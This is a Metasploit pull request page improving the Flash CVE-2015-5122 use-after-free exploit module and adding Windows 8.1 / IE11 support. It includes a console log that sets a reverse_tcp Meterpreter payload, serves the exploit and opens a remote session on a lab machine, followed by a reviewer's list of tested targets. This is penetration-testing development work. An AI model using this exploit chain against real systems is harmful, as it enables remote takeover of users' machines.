
Improve Adobe Flash CVE-2015-5122, add Windows 8.1 (32bits) / IE11 support #5742

Merged
merged 1 commit into from Jul 17, 2015

Conversation

jvazquez-r7
Contributor

This PR modifies adobe_flash_opaque_background_uaf to:

  • Improve exploit reliability
  • Add support for Windows 8.1 (32bits) / IE11 / Flash 18

Verification

  • Install a target: Windows 8.1 (32 bits) / IE11 and Flash 18. I've used Flash 18.0.0.194 from a snapshot I had saved.
  • Run the module, visit the URL with the target and verify that you get a session:
msf exploit(adobe_flash_opaque_background_uaf) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(adobe_flash_opaque_background_uaf) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_opaque_background_uaf) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(adobe_flash_opaque_background_uaf) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

msf exploit(adobe_flash_opaque_background_uaf) >
[*] 172.16.158.135   adobe_flash_opaque_background_uaf - Gathering target information.
[*] 172.16.158.135   adobe_flash_opaque_background_uaf - Sending HTML response.
[*] 172.16.158.135   adobe_flash_opaque_background_uaf - Request: /Q4GlnHBj3Q/EbdyPr/
[*] 172.16.158.135   adobe_flash_opaque_background_uaf - Sending HTML...
[*] 172.16.158.135   adobe_flash_opaque_background_uaf - Request: /Q4GlnHBj3Q/EbdyPr/dEXU.swf
[*] 172.16.158.135   adobe_flash_opaque_background_uaf - Sending SWF...
[*] Sending stage (885806 bytes) to 172.16.158.135
[*] Meterpreter session 3 opened (172.16.158.1:4444 -> 172.16.158.135:49874) at 2015-07-16 14:53:15 -0500

msf exploit(adobe_flash_opaque_background_uaf) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: WIN-U7MBH836GNO\juan
meterpreter > getpid
Current pid: 3152
meterpreter > ps -S 3152


Process list
============

 PID   Name              Arch  Session  User                  Path
 ---   ----              ----  -------  ----                  ----
 3152  iexplore.exe      x86   1        WIN-U7MBH836GNO\juan  C:\Program Files\Internet Explorer\iexplore.exe


meterpreter > sysinfo
Computer        : WIN-U7MBH836GNO
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

@wchen-r7
Contributor

@jvazquez-r7 :

Successfully tested on:

  • Windows 7 SP1 + IE9 + Flash 18.0.0.203
  • Windows 7 SP1 + Firefox 39.0 + Flash 18.0.0.203
  • Windows 7 SP1 + IE11 + Flash 18.0.0.203
  • Windows 7 SP1 + IE11 + Flash 18.0.0.194
  • Windows 7 SP1 + Firefox 39.0 + Flash 18.0.0.194
  • Windows 7 SP1 + IE 9 + Flash 18.0.0.194
  • Windows 8.1 + Firefox 39.0 + Flash 18.0.0.160
  • Windows 8.1 + Firefox 39.0 + Flash 18.0.0.203
  • Windows 8.1 + IE 11 + Flash 18.0.0.194
  • Windows XP SP3 + IE8 + Flash 18.0.0.194
  • Windows XP SP3 + IE 8 + Flash 18.0.0.203
  • Windows XP SP3 + Firefox + Flash 18.0.0.203
  • Windows Vista SP2 + IE 9 + Flash 18.0.0.203
  • Windows Vista SP2 + Firefox 39.0 + Flash 18.0.0.203
  • BAP2 vs Windows 8.1 + IE 11 + Flash 18.0.0.194

I'll open up the requirements to those targets (XP and Vista). Can I bump the Rank to Great?

@wchen-r7 wchen-r7 merged commit 255d8ed into rapid7:master Jul 17, 2015